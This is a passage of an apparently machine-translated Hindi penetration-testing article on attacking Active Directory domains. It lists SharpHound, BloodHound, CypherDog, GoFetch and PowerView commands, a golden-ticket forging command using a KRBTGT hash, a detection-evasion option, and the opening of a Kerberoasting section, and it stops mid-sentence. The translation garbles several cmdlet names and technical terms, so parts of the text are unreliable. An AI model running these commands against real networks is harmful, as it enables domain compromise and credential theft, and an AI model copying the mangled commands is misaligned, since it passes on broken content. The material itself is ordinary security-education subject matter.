  • рдЪреБрдкрдХреЗ - рдЪреБрдкрдХреЗ рд╕рдВрдЧреНрд░рд╣ рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рдкреНрд░рджрд░реНрд╢рди рдХрд░рддрд╛ рд╣реИред рд╕рднреА рд╕реНрдЯреАрд▓реНрде рд╡рд┐рдХрд▓реНрдк рд╕рд┐рдВрдЧрд▓ рдереНрд░реЗрдбреЗрдб рд╣реИрдВ
  • SkipGCDeconfliction - рд╕рддреНрд░ рдЧрдгрдирд╛ рдХреЗ рджреМрд░рд╛рди рд╡реИрд╢реНрд╡рд┐рдХ рдХреИрдЯрд▓реЙрдЧ deconfliction рдЫреЛрдбрд╝реЗрдВред рдпрд╣ рдЧрдгрдирд╛ рдореЗрдВ рддреЗрдЬреА рд▓рд╛ рд╕рдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдбреЗрдЯрд╛ рдореЗрдВ рд╕рдВрднрд╛рд╡рд┐рдд рдЕрд╢реБрджреНрдзрд┐рдпреЛрдВ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рд╣реЛрдЧрд╛
  • ExcludeDc - рдЧрдгрдирд╛ рд╕реЗ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХреЛрдВ рдХреЛ рд╣рдЯрд╛рддрд╛ рд╣реИ (Microsoft ATA рдЭрдВрдбреЗ рд╕реЗ рдмрдЪрд╛ рдЬрд╛рддрд╛ рд╣реИ)
  • ComputerFile - рд╕реЗ рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рдирд╛рдо / IP рд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдлрд╝рд╛рдЗрд▓ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░реЗрдВ
  • OU - рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░реЗрдВ рдХрд┐ рдХреМрди рд╕рд╛ OU рдПрдиреНрдпреВрдорд░реЗрдЯ рдХрд░рддрд╛ рд╣реИ


рд╕реВрдЪрдирд╛ рд╕рдВрдЧреНрд░рд╣рдХрд░реНрддрд╛ SharpHound.exe (рд╕реНрдерд╛рдкрд┐рдд .NET v3.5 рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ) рдФрд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ SharpHound.ps1 рдХреЛ рдкреЙрд╡рд░рд╢реЗрд▓ рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИред рдПрдХ рдерд░реНрдб рдкрд╛рд░реНрдЯреА рдкрд╛рдпрдерди рдбреЗрд╡рд▓рдкрд░, рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб- рдкрд╛рдпрдерди рджреНрд╡рд╛рд░рд╛ рд▓рд┐рдЦрд┐рдд рдПрдХ рдХрдВрдкрд╛рдЗрд▓рд░ рднреА рд╣реИред

рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЗ рд░реВрдк рдореЗрдВ, Neo4j рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЕрдкрдирд╛ рд╕рд┐рдВрдЯреИрдХреНрд╕ рд╣реЛрддрд╛ рд╣реИ, рдЬреЛ рдЖрдкрдХреЛ рдХрд╕реНрдЯрдо рдХреНрд╡реЗрд░реА рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдЖрдк рдпрд╣рд╛рдБ рд╕рд┐рдВрдЯреИрдХреНрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдкрдврд╝ рд╕рдХрддреЗ рд╣реИрдВред

рдмреЙрдХреНрд╕ рдореЗрдВ рд╕реЗ 12 рдЕрдиреБрд░реЛрдз рдЙрдкрд▓рдмреНрдз рд╣реИрдВ
  • рд╕рднреА рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦреЛрдЬреЗрдВ
  • рдбреЛрдореЗрди рдХреЗ рд╕рдмрд╕реЗ рдЫреЛрдЯреЗ рдкрде рдЦреЛрдЬреЗрдВ
  • DCSync рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдкреНрд░рд┐рдВрд╕рд┐рдкрд▓ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдПрдВ
  • рд╡рд┐рджреЗрд╢реА рдбреЛрдореЗрди рд╕рдореВрд╣ рд╕рджрд╕реНрдпрддрд╛ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛
  • рд╡рд┐рджреЗрд╢реА рдбреЛрдореЗрди рд╕рдореВрд╣ рд╕рджрд╕реНрдпрддрд╛ рд╡рд╛рд▓реЗ рд╕рдореВрд╣
  • рдорд╛рдирдЪрд┐рддреНрд░ рдбреЛрдореЗрди рдЯреНрд░рд╕реНрдЯ
  • рдЕрд╕рдВрдмрдВрдзрд┐рдд рдкреНрд░рддрд┐рдирд┐рдзрд┐ рдкреНрд░рдгрд╛рд▓рд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рд╕рдмрд╕реЗ рдЫреЛрдЯрд╛ рд░рд╛рд╕реНрддрд╛
  • Kerberoastable рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рд╕реЗ рд╕рдмрд╕реЗ рдЫреЛрдЯрд╛ рдкрде
  • Kerberoastable рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рд╕реЗ рдбреЛрдореЗрди рдХреЗ рд╕рдмрд╕реЗ рдЫреЛрдЯреЗ рдкрде
  • рд▓рдШреБ рдорд╛рд░реНрдЧ рдкреНрд░рдзрд╛рдирд╛рдзреНрдпрд╛рдкрдХреЛрдВ рд╕реЗ
  • рд╕реНрд╡рд╛рдорд┐рддреНрд╡ рд╡рд╛рд▓реЗ рдкреНрд░рдзрд╛рдирд╛рдЪрд╛рд░реНрдпреЛрдВ рд╕реЗ рдбреЛрдореЗрди рдкреНрд░рд╡реЗрд╢ рдХреЗ рд▓рд┐рдП рд╕рдмрд╕реЗ рдЫреЛрдЯрд╛ рд░рд╛рд╕реНрддрд╛
  • рдЙрдЪреНрдЪ рдореВрд▓реНрдп рд▓рдХреНрд╖реНрдп рдХреЗ рд▓рд┐рдП рд╕рдмрд╕реЗ рдЫреЛрдЯрд╛ рд░рд╛рд╕реНрддрд╛


рдбреЗрд╡рд▓рдкрд░реНрд╕ DBCreator.py рд╕реНрдХреНрд░рд┐рдкреНрдЯ рднреА рдкреНрд░рджрд╛рди рдХрд░рддреЗ рд╣реИрдВ, рдЬреЛ рдЖрдкрдХреЛ рдкрд░реАрдХреНрд╖рдг рдХреЗ рд▓рд┐рдП рдПрдХ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдбреЗрдЯрд╛рдмреЗрд╕ рдЙрддреНрдкрдиреНрди рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред



Neo4j рдХрд╛ REST API рд╣реИред рд╡рд┐рднрд┐рдиреНрди рдЙрдкрдпреЛрдЧрд┐рддрд╛рдУрдВ рд╣реИрдВ рдЬреЛ рдбреЗрдЯрд╛рдмреЗрд╕ рд╕реЗ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдкреНрд░рд╛рдкреНрдд рдбреЗрдЯрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:


рдЖрдЗрдП рдЙрдирдореЗрдВ рд╕реЗ рдХреБрдЫ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВред

CypherDog


рд╕рд╛рдЗрдлреЛрд░рдбреЙрдЧ рдПрдХ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рд╢реЗрд▓ рд╣реИ рдЬрд┐рд╕реЗ рд╢рдХреНрддрд┐рдпрдВрддреНрд░ рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИред 27 cmdlets рд╢рд╛рдорд┐рд▓ рд╣реИрдВред

Cmdlet рд╕реВрдЪреА
cmdletрд╕рд╛рд░
Get-BloodHoundCmdletBloodHound RTFM - Cmdlet рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
рд╕рдВрджреЗрд╢-BloodHoundPostрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдкреЛрд╕реНрдЯ - рд╕рд╛рдЗрдлрд░ рдЯреВ рд░реЗрд╕реНрдЯ рдПрдкреАрдЖрдИ
Get-BloodHoundNodeрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рдиреЛрдб рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
рдЦреЛрдЬ-BloodHoundNodeрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рдЦреЛрдЬ рдиреЛрдб
рдирдИ BloodHoundNodeрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рдиреЛрдб рдмрдирд╛рдПрдБ
рд╕реЗрдЯ BloodHoundNodeрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рдЕрдкрдбреЗрдЯ рдиреЛрдб
рдирд┐рдХрд╛рд▓реЗрдВ-BloodHoundNodeBloodHound Node - рдиреЛрдб рд╣рдЯрд╛рдПрдВ
Get-BloodHoundNodeListрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundNodeHighValueрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рд╣рд╛рдИрд╡реИрд▓реНрдпреВ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundNodeOwnedрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рд╕реНрд╡рд╛рдорд┐рддреНрд╡ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundNodeNoteрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рдзреНрдпрд╛рди рджреЗрдВ
рд╕реЗрдЯ BloodHoundNodeNoteрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рд╕реЗрдЯ рдиреЛрдЯреНрд╕
Get-BloodHoundBlacklistрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рдмреНрд▓реИрдХрд▓рд┐рд╕реНрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
рд╕реЗрдЯ BloodHoundBlacklistрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЛрдб - рд╕реЗрдЯ рдмреНрд▓реИрдХрд▓рд┐рд╕реНрдЯ
рдирд┐рдХрд╛рд▓реЗрдВ-BloodHoundBlacklistBloodHound Node - рдмреНрд▓реИрдХрд▓рд┐рд╕реНрдЯ рдирд┐рдХрд╛рд▓реЗрдВ
Get-BloodHoundEdgeBloodHound Edge - рд▓рдХреНрд╖реНрдп рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundEdgeReverseрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдПрдЬ - рд╕реНрд░реЛрдд рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundEdgeCrossDomainрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдПрдЬ - рдХреНрд░реЙрд╕рдбреЛрдореИрди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundEdgeCountрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдПрдЬ - рдХрд╛рдЙрдВрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundEdgeInfoBloodHound Edge - рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
рдирдИ BloodHoundEdgeрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдПрдЬ - рдПрдЬ рдмрдирд╛рдПрдБ
рдирд┐рдХрд╛рд▓реЗрдВ-BloodHoundEdgeBloodHound Edge - рдбрд┐рд▓реАрдЯ рдПрдЬ
Get-BloodHoundPathShortрд░рдХреНрддрдкрде рдкрде - рд╕рдмрд╕реЗ рдЫреЛрдЯрд╛ рд╣реЛ
Get-BloodHoundPathAnyрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдкрде - рдХреЛрдИ рднреА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundPathCostрд░рдХреНрддрдкрде рдкрде - рд▓рд╛рдЧрдд рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-BloodHoundPathCheapрдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдкрде - рд╕рдмрд╕реЗ рд╕рд╕реНрддрд╛ рд╣реЛ рдЬрд╛рдУ
Get-BloodHoundWald0IOBloodHound Path - Wald0 Index рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ


рдЙрдкрдпреЛрдЧ рдХреЗ рдЙрджрд╛рд╣рд░рдг
рдЯреАрдорд╡рд┐рд╡рд░рдг
Search-BloodHoundNode -Type Computer -Property unconstraineddelegation -Value $ true | рдЪрдпрдирд┐рдд рдирд╛рдо, Serviceprincipalnames, unconstraineddelegation, рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо | рдкреНрд░рд╛рд░реВрдк-рд╕реВрдЪреАрдЕрд╕реАрдорд┐рдд рдХреЗрд░реНрдмрд░реЛрд╕ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рд╕рд╛рде рдХрдВрдкреНрдпреВрдЯрд░ рдХреА рдЦреЛрдЬ рдХрд░реЗрдВ
рдПрдЬ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ ADMINISTRATOR@JET.LAB рд╕рджрд╕реНрдпрдСрдл рд╕рдореВрд╣рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдореВрд╣реЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдВ
рдХрдВрдкреНрдпреВрдЯрд░ рд╣рд╕ рд╕рддреНрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ ADMINISTRATOR@JET.LABрдЙрди рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдБ рдЬрд╣рд╛рдБ рдПрдХ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рддреНрд░ рд╣реИ
рдкрде рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрдВрдкреНрдпреВрдЯрд░ HARVEY@JET.LAB DC1.JET.LABрдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реЗ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХреЗ рд▓рд┐рдП рдкрде рдкреНрд░рд┐рдВрдЯ рдХрд░реЗрдВ
рдХреНрдпрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдореЗрдВрдмрд░ рдЧреНрд░реБрдк 'DOMAIN ADMINS@JET.LAB' * | рд╕реВрдЪреА рд▓реЙрдЧрдСрдирд╕рдХреНрд░рд┐рдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рддреНрд░реЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдБ рдЬреЛ DOMAIN Admins рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдп рд╣реИрдВ
рдХреНрдпрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдореЗрдВрдмрд░ рдЧреНрд░реБрдк 'DOMAIN ADMINS@JET.LAB' | рд╕реВрдЪреА рд▓реЙрдЧрдСрди | operat * -рдореИрдЪ 7 | рд╕реВрдЪреА AdminTo | рдирд╛рдо рдЪреБрдиреЗрдВрдЙрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░реЗрдВ, рдЬрд┐рдирдХреЗ рдкрд╛рд╕ рд╡рд┐рдВрдбреЛрдЬ 7 рдкрд░ рдЪрд▓рдиреЗ рд╡рд╛рд▓реЗ рд╡рд░реНрдХрд╕реНрдЯреЗрд╢рдиреЛрдВ рдкрд░ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдзрд┐рдХрд╛рд░ рд╣реИрдВ, рдЬрд┐рдирдХреЗ рдкрд╛рд╕ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рд╕рдореВрд╣ рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХрд╛ рдПрдХ рд╕рддреНрд░ рд╣реИ


рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ, neo4j рдбреЗрдЯрд╛рдмреЗрд╕ рддрдХ рдкрд╣реБрдВрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЖрд╡рд╢реНрдпрдХ рд╣реИред рдЖрдк neo4j.conf рдлрд╝рд╛рдЗрд▓ рдХреЛ рд╕рдВрдкрд╛рджрд┐рдд рдХрд░рдХреЗ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЛ рдЕрдХреНрд╖рдо рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЗрд╕реЗ рд▓рд╛рдЗрди dbms.security.auth_enabled = false рдХреЛ рдЕрдирдЗрдВрд╕реНрдЯреЙрд▓ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ ред рд▓реЗрдХрд┐рди рдпрд╣ рдЕрдиреБрд╢рдВрд╕рд┐рдд рдирд╣реАрдВ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдХреЛрдИ рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ 127.0.0.1:7474 (рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди) рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдЖрдк рдпрд╣рд╛рдБ neo4j рдореЗрдВ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдФрд░ рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдкрдврд╝ рд╕рдХрддреЗ рд╣реИрдВ ред

GoFetch


рд╣рдорд▓реЗ рдХреА рдпреЛрдЬрдирд╛ рдмрдирд╛рдиреЗ рдФрд░ рдЙрд╕реЗ рдЕрдВрдЬрд╛рдо рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП GoFetch рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдореЗрдВ рдмрдирд╛рдП рдЧрдП рдЧреНрд░рд╛рдлрд╝ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред

рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдЧреНрд░рд╛рдл рдЙрджрд╛рд╣рд░рдг


GoFetch рддрд░реНрдХ


рд╣рдорд▓рд╛ рд╢реБрд░реВ

 .\Invoke-GoFetch.ps1 -PathToGraph .\pathFromBloodHound.json 

GT-рдЬрдирд░реЗрдЯрд░


рдЬреАрдИрдПрдЪ -рдЬрдирд░реЗрдЯрд░ , рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдбреЗрдЯрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рдЧреЛрд▓реНрдбрди рдЯрд┐рдХрдЯ рдмрдирд╛рдирд╛ рдЖрд╕рд╛рди рдмрдирд╛рддрд╛ рд╣реИред рдПрдХ рд╕реНрд╡рд░реНрдг рдЯрд┐рдХрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдХреЗрд╡рд▓ KRBTGT рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред

 python gt-generator.py -s 127.0.0.1 -u user -p pass administrator <KRBTGT_HASH> 



PowerView


рдкреЙрд╡рд░ рд╡реНрдпреВ рдПрдХ рдкреЙрд╡рд░рд╢реЗрд▓ рдлреНрд░реЗрдорд╡рд░реНрдХ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдкреЙрд╡рд░рд╕реНрдкреНрд▓реЛрдЗрдЯ рд╢рд╛рдорд┐рд▓ рд╣реИред рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХреБрдЫ cmdlets рдХреА рдПрдХ рд╕реВрдЪреА рд╣реИ рдЬреЛ рдЖрдкрдХреЛ рдПрдХ рдбреЛрдореЗрди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдЗрдХрдЯреНрдард╛ рдХрд░рдиреЗ рдореЗрдВ рдорджрдж рдХрд░ рд╕рдХрддреА рд╣реИред

Cmdlet рд╕реВрдЪреА
Get-NetDomain -Domain jet.labрд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-DomainSIDрд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди SID рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-NetDomainController -Domain jet.labрдХрд┐рд╕реА рдбреЛрдореЗрди рдХреЗ рд▓рд┐рдП рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-NetUser -Domain jet.lab -UserName labuserрдХрд┐рд╕реА рдбреЛрдореЗрди рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
рдЧреЗрдЯ-рдиреЗрдЯрдЧреНрд░реБрдк * group_name *рд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдореЗрдВ рд╕рднреА рд╕рдореВрд╣ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-NetGroupMember -GroupName "рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ"рдбреЛрдореЗрди рдкреНрд░рд╡реЗрд╢ рд╕рдореВрд╣ рдХреЗ рд╕рднреА рд╕рджрд╕реНрдпреЛрдВ рдХреЛ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-NetGroup -UserName "domain_user"рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓рд┐рдП рд╕рдореВрд╣ рд╕рджрд╕реНрдпрддрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Get-NetComputer -FullDataрдбреЛрдореЗрди рдХреЗ рд╕рднреА рдХрдВрдкреНрдпреВрдЯрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
Find-LocalAdminAccess -Verboseрд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдкрд░ рд╕рднреА рдорд╢реАрдиреЗрдВ рдвреВрдВрдвреЗрдВ рдЬрд╣рд╛рдВ рд╡рд░реНрддрдорд╛рди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╣реБрдВрдЪ рд╣реИ
Get-NetSession -ComputerName dc02.jet.labрдХрд┐рд╕реА рд╡рд┐рд╢реЗрд╖ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд╕реВрдЪреА рд╕рддреНрд░
рдЖрд╣реНрд╡рд╛рди рдХрд░реЗрдВ-UserHunter -CheckAccessрдЙрди рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдХреЛ рдвреВрдВрдвреЗрдВ рдЬрд╣рд╛рдБ рдПрдХ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд▓реЙрдЧ рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдФрд░ рд╡рд░реНрддрдорд╛рди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдкрд╣реБрдВрдЪ рд╣реИ


Adidnsdump


рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рдПрдХреАрдХреГрдд DNS рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╕рдордп, рдХреЛрдИ рднреА рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рднреА рдбрд┐рдлрд╝реЙрд▓реНрдЯ DNS рд░рд┐рдХреЙрд░реНрдб рдХреЛ рдХреНрд╡реЗрд░реА рдХрд░ рд╕рдХрддрд╛ рд╣реИред

рдЙрдкрдХрд░рдг рдХрд╛ рдЗрд╕реНрддреЗрдорд╛рд▓ рдХрд┐рдпрд╛: Adidnsdump



рдбреЛрдореЗрди рдЕрдЯреИрдХ


рдЕрдм рдЬрдм рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдбреЛрдореЗрди рдЬрд╛рдирдХрд╛рд░реА рд╣реИ, рддреЛ рд╣рдо рдкреНрд░рд╡реЗрд╢ рдкрд░реАрдХреНрд╖рдг рдХреЗ рдЕрдЧрд▓реЗ рдЪрд░рдг рдкрд░ рдЬрд╛рддреЗ рд╣реИрдВ - рд╕реАрдзреЗ рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдПред 4 рд╕рдВрднрд╛рд╡рд┐рдд рд╡реИрдХреНрдЯрд░ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ:

  1. рднреВрдирдирд╛
  2. рдПрд╕реАрдПрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣рдорд▓рд╛
  3. рдХрд░реНрдмрд░реЛрд╕ рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓
  4. рдЬреАрдкреАрдУ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ


рднреВрдирдирд╛


рдЗрд╕ рддрд░рд╣ рдХреЗ рд╣рдорд▓реЗ рд╕реЗ рдХреЗрд░реНрдмрд░реЛрд╕ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЛ рдирд┐рд╢рд╛рдирд╛ рдмрдирд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рд░реЛрд╕реНрдЯрд┐рдВрдЧ рдЬреИрд╕реЗ 2 рдкреНрд░рдХрд╛рд░ рдХреЗ рд╣рдорд▓реЗ рд╣реИрдВ:

  • Kerberoast
  • Asreproast

Kerberoast


рд╣рдорд▓рд╛ рдкрд╣рд▓реА рдмрд╛рд░ 2014 рдореЗрдВ рдбрд░реНрдмреАрдХреЙрди рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЯрд╛рдЗрдордореЗрдбрд┐рди рджреНрд╡рд╛рд░рд╛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ ( рд╡реАрдбрд┐рдпреЛ )ред рдПрдХ рд╕рдлрд▓ рд╣рдорд▓реЗ рдХреЗ рд╕рд╛рде, рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЕрд╡рд░реБрджреНрдз рдХрд░рдиреЗ рдХреЗ рдбрд░ рдХреЗ рдмрд┐рдирд╛, рдСрдлрд╝рд▓рд╛рдЗрди рдореЛрдб рдореЗрдВ рд╕реЗрд╡рд╛ рдЕрд▓реНрдЯреНрд░рд╛рд╕рд╛рдЙрдВрдб рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рд╕реЙрд░реНрдЯ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдВрдЧреЗред рдЕрдХреНрд╕рд░, рд╕реЗрд╡рд╛ рдЦрд╛рддреЛрдВ рдореЗрдВ рдЕрддреНрдпрдзрд┐рдХ рдЕрдзрд┐рдХрд╛рд░ рдФрд░ рдПрдХ рд╕реНрдерд╛рдпреА рдкрд╛рд╕рд╡рд░реНрдб рд╣реЛрддрд╛ рд╣реИ, рдЬреЛ рд╣рдореЗрдВ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗ рд╕рдХрддрд╛ 